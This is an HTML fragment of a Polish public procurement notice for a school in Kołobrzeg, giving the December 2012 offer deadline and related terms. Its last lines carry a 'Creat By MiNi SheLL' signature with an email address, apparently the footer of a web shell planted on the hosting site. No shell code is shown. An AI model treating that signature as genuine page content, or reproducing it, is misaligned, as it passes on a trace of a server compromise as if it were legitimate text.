<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2012 godzina 09:00, miejsce: Zespół Szkół Ekonomiczno-Hotelarskich ul.Łopuskiego 13, 78-100 Kołobrzeg pok.114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com